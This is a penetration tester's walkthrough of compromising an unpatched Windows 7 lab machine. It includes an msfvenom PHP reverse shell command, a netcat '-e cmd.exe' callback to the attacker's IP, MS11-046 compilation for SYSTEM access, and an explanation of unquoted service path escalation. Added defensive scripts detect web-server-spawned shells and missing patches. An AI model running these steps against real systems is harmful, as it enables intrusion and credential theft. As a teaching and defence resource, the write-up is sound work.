Hacking Windows 7 SP1 systems

https://www.linkedin.com/pulse/example-hacking-windows-7-sp1-owning-system-gerhard-mohr

What happens when you don’t keep your system up to date.

Example of Hacking Windows 7 SP1 and owning System

Gerhard Mohr, Penetration Tester | Ethical Hacker | Red Team – Sphere Cyber Security Unit

First we start with an Nmap scan:

root@kali:~# nmap -sV -sC 1.1.1.1 --top-ports 100 --reason --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-25 17:17 MDT
Nmap scan report for 1.1.1.1
Host is up, received arp-response (0.18s latency).
Not shown: 87 filtered ports
Reason: 87 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
554/tcp   open  rtsp?        syn-ack ttl 128
3306/tcp  open  mysql        syn-ack ttl 128 MySQL (unauthorized; French)
5357/tcp  open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5800/tcp  open  vnc-http     syn-ack ttl 128 TightVNC (user: gamma; VNC TCP port: 5900)
|_http-title: TightVNC desktop [gamma]
5900/tcp  open  vnc          syn-ack ttl 128 VNC (protocol 3.8)
| vnc-info:
|   Protocol version: 3.8
|   Security types:
|     VNC Authentication (2)
|     Tight (16)
|   Tight auth subtypes:
|_    STDV VNCAUTH_ (2)
8080/tcp  open  http         syn-ack ttl 128 Apache httpd 2.4.9 ((Win32) PHP/5.5.12)
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/testmysql.php
|_http-server-header: Apache/2.4.9 (Win32) PHP/5.5.12
|_http-title: Site doesn't have a title (text/html).
49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 00:50:56:B8:4A:94 (VMware)
Service Info: Host: LAB1; OS: Windows; CPE: cpe:/o:microsoft:window

We then perform a directory brute force on port 8080, based on the information in the nmap scan above.

We found the following: http://1.1.1.1:8080/php/install

We downloaded babinstall.sql and searched the database install file for users.

We found the user admin@admin.bab and some password hashes (don't try to crack these, I changed them for this article):

200cab26807d6bf99fd6f4f0d1ca54d4

22995d8a5ed1b91445f6c55ac121505b

0da8f2a37b9e7966e08196a6bd1baa29

We identified the above password hashes as MD5 hashes and proceeded to crack them using hashcat, which recovered the following plaintext passwords:

  1. 200cab26807d6bf99fd6f4f0d1ca54d4 = administrator
  2. 22995d8a5ed1b91445f6c55ac121505b = 012345678

We can now try to log in to the admin panel of the web application with admin@admin.bab and the password 012345678, and we are logged into the admin panel as administrator.


Looking around the application, I noticed that we cannot upload any files. I then proceeded to find where to change the configuration for this and found it via the "site" page. I configured the necessary parameters to allow me to upload a reverse shell. Keep in mind that I am going to want to upload a *.php shell, as nmap confirmed that PHP is what is running on the system. You can also confirm this from the above: the page ends in index.php.

Since this is a Windows system and most PHP reverse shells are built for Linux, I will have to make my own Windows PHP reverse shell. This is achieved by running the following command on my attacking system:

msfvenom -p php/reverse_php LHOST=1.1.1.2 LPORT=443 -f raw > /var/www/html/WindowsPHPShells/myshellwin.php

I proceed to upload the shell to the uploads directory and then execute it by visiting its URL: http://1.1.1.1:8080/php/123/fileManager/users/U1/Testing/myshellwin.php. Before doing so, we need to create a listener on our attacking machine to catch the reverse connection.

Creating the listener: nc -nlvp 443

We get the shell back to our attacking system. But wait, it's not a fully interactive shell, and after a few minutes my shell dies/disconnects.

I proceed to upload nc.exe to the Windows machine using the same method I used to upload the shell, thinking that if I can hold a non-interactive shell for at least one minute, I can set up another reverse listener on our attacking system and execute a second reverse shell on the Windows system to get a fully interactive shell.

On the Windows system I got my non-interactive shell again and quickly executed nc -nvv 1.1.1.2 4444 -e cmd.exe, and on my attacking system I ran the command to start a second listener: nc -nlvp 4444

And it worked!!! I have a full shell with full functionality. I have hacked into this Windows machine.
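From the defender's side, the chain above leaves a distinctive trace in process-creation telemetry: the web server spawns cmd.exe, and cmd.exe launches netcat with its "-e" flag. The following detection logic is an added example, not part of the article; the Sysmon-style events and the WAMP paths in it are constructed, and the "Key=Value|Key=Value" line format is assumed for simplicity.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str

# Web server / PHP worker processes that should never spawn an interactive shell.
WEB_SERVER_IMAGES = {"httpd.exe", "php.exe", "php-cgi.exe", "w3wp.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
# netcat's "-e <program>" flag, as used in the write-up (nc -nvv <ip> <port> -e cmd.exe)
NC_EXEC_RE = re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S+", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])

def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, child, parent) for every event matching either rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        child, parent = basename(ev.image), basename(ev.parent_image)
        if parent in WEB_SERVER_IMAGES and child in SHELL_IMAGES:
            hits.append(("web_server_spawned_shell", child, parent))
        if NC_EXEC_RE.search(ev.command_line):
            hits.append(("netcat_exec_flag", child, parent))
    return hits

# Constructed sample events (not real logs); simplified Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    "Image=C:\\wamp\\bin\\apache\\apache2.4.9\\bin\\httpd.exe|ParentImage=C:\\wamp\\wampmanager.exe|CommandLine=httpd.exe",
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\wamp\\bin\\apache\\apache2.4.9\\bin\\httpd.exe|CommandLine=cmd.exe /c whoami",
    "Image=C:\\wamp\\www\\php\\uploads\\nc.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=nc -nvv 1.1.1.2 4444 -e cmd.exe",
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=cmd.exe",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The first rule fires on the PHP web shell's first command, the second on the nc.exe hand-off to the second listener; a benign cmd.exe started from explorer.exe matches neither.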


This is not where it stops. Why? We want to own the system and retrieve passwords from it. If we are NT AUTHORITY\SYSTEM, we own and control this Windows 7 machine.

User Privilege Escalation

First we look at systeminfo

OS Name:      Microsoft Windows 7 Professional
OS Version:   6.1.7601 Service Pack 1 Build 7601

Hotfixes are the latest patches and security updates installed.

------- Patches (also listed as part of systeminfo) -------
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2534111  Hotfix           KB2534111  12/31/2014
http://support.microsoft.com/?kbid=3045171  Security Update  KB3045171  5/11/2016
http://support.microsoft.com/?kbid=3124280  Security Update  KB3124280  3/31/2017
http://support.microsoft.com/?kbid=4012212  Security Update  KB4012212  2/8/2018
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/20/2010

In order not to make this article a long one, I am skipping straight to the juicy stuff. Normally a lot more is checked, like which files users have write access to. Another check is whether service paths are properly quoted, for example "C:\Program Files\Program Name\". If a path is not properly quoted, an attacker can use this to escalate privileges to SYSTEM because of the way Windows finds programs. To explain this, Windows will start as follows:

C:

C:\Program

C:\Program Files\

C:\Program Files\Program

and so on and so on. So basically all you need to do is place your malicious executable at the beginning of the program folder so that Windows executes it and boom, you have escalated your privileges. This, however, was not the case in this scenario, and I had to look at a kernel exploit.
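The quoting check described above is easy to automate as a hardening audit. The code below is an added example, not the author's tooling; it applies the CreateProcess search order to a service's ImagePath (each prefix cut at a space, with .exe appended, before the real executable) and reports, for every unquoted path, the spurious locations Windows would try first. The service names and paths are constructed.

```python
import re
from typing import Dict, List

def executable_part(image_path: str) -> str:
    """Executable portion of a service ImagePath (everything up to and including '.exe')."""
    m = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)
    return m.group(1) if m else image_path

def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not wrapped in quotes and the executable path contains a space."""
    p = image_path.strip()
    return not p.startswith('"') and " " in executable_part(p)

def probe_candidates(image_path: str) -> List[str]:
    """Locations Windows tries, in order, for an unquoted path containing spaces:
    each prefix cut at a space with '.exe' appended, and finally the real executable."""
    exe = executable_part(image_path.strip())
    cands = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    cands.append(exe)
    return cands

def audit_services(services: Dict[str, str]) -> Dict[str, List[str]]:
    """For every unquoted service, the spurious paths Windows would try before the real one.
    The fix is to quote the ImagePath and to verify that standard users cannot write
    to the directories those paths live in."""
    findings = {}
    for name, path in services.items():
        if is_unquoted_with_spaces(path):
            findings[name] = probe_candidates(path)[:-1]
    return findings

# Constructed sample ImagePath values (not from a real system).
SAMPLE_SERVICES = {
    "QuotedSvc":   '"C:\\Program Files\\Vendor\\svc.exe" -k run',
    "UnquotedSvc": "C:\\Program Files\\Program Name\\svc.exe -k run",
    "SystemSvc":   "C:\\Windows\\System32\\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES).items():
        print(svc, "->", paths)
```

On a real host the ImagePath values come from HKLM\SYSTEM\CurrentControlSet\Services\<name>; for each reported path, confirm the directory ACL with icacls and quote the ImagePath.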

Google-fu for the OS version and service pack found an exploit, MS11-046, which describes a vulnerability in the Windows Ancillary Function Driver. The Ancillary Function Driver for Winsock service is a kernel driver. If the Ancillary Function Driver for Winsock is stopped, the following services will not start and initialize: DHCP Client and TCP/IP NetBIOS Helper. It was fixed in patch KB2503665.

I looked at the installed patches and verified that this patch was indeed not installed. So now there is a very strong possibility that we can escalate our user's privileges to SYSTEM. So let's try it.
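The check the author did by eye (is the fixing KB in the hotfix list, and how stale is the box?) is what a patch-compliance script should do for every host. This is an added example, not from the article; it parses the hotfix table printed above, looks for KB2503665 (the MS11-046 fix named in the text), and reports the most recent install date. The bulletin-to-KB map holds only that one entry and must be extended from Microsoft's bulletin pages for a real baseline; note that a missing KB is a strong signal, not proof, since later rollups can supersede it.

```python
import re
from datetime import date
from typing import Dict, List, Optional, Set

# Hotfix table as printed by "wmic qfe list"/systeminfo; rows are the ones shown in this write-up.
HOTFIX_OUTPUT = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2534111  Hotfix           KB2534111  12/31/2014
http://support.microsoft.com/?kbid=3045171  Security Update  KB3045171  5/11/2016
http://support.microsoft.com/?kbid=3124280  Security Update  KB3124280  3/31/2017
http://support.microsoft.com/?kbid=4012212  Security Update  KB4012212  2/8/2018
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/20/2010
"""

# Bulletin -> KB that fixes it. KB2503665 is the MS11-046 fix named in the text; extend the
# map from Microsoft's bulletin pages for a real baseline (this is not a complete list).
REQUIRED_KBS = {"MS11-046": "KB2503665"}

KB_RE = re.compile(r"\bKB\d{6,7}\b")
DATE_RE = re.compile(r"\b(\d{1,2})/(\d{1,2})/(\d{4})\b")

def installed_kbs(output: str) -> Set[str]:
    """All KB ids found on data rows (header row skipped)."""
    kbs = set()
    for line in output.splitlines()[1:]:
        kbs.update(KB_RE.findall(line))
    return kbs

def missing_fixes(output: str, required: Dict[str, str] = REQUIRED_KBS) -> List[str]:
    """Bulletins whose fixing KB is absent from the hotfix list."""
    have = installed_kbs(output)
    return sorted(b for b, kb in required.items() if kb not in have)

def last_install_date(output: str) -> Optional[date]:
    """Most recent InstalledOn date (M/D/YYYY), a quick staleness indicator."""
    dates = [date(int(y), int(m), int(d)) for m, d, y in DATE_RE.findall(output)]
    return max(dates) if dates else None

if __name__ == "__main__":
    print("installed:", sorted(installed_kbs(HOTFIX_OUTPUT)))
    print("missing fixes:", missing_fixes(HOTFIX_OUTPUT))
    print("last patch installed:", last_install_date(HOTFIX_OUTPUT))
```

For the table above the script reports MS11-046 as unpatched and a last install date in February 2018, over a year and a half before the scan date in the nmap output.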

I downloaded the exploit and compiled it, since it was written in C, by running the following command: i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

I then uploaded the compiled exploit and ran it as MS11-046.exe, and there we have it: the system is fully compromised and I am running as NT AUTHORITY\SYSTEM.


Our next step is dumping Windows credentials. The reason we do this is that users normally use the same credentials on all systems, which makes it easier to pwn another system. We can also dump network traffic and see if any passwords are being transmitted in clear text. If this machine is connected to a network and domain, and we could retrieve domain admin credentials, we could take over the whole network, as the administrator password will be used on all systems.

Now you can see how important it is to keep your systems patched and updated. A compromise like this can destroy your business.

Hope you enjoyed this article.

Gerhard De Villiers-Mohr (Ethical Hacker and Senior Penetration Tester)
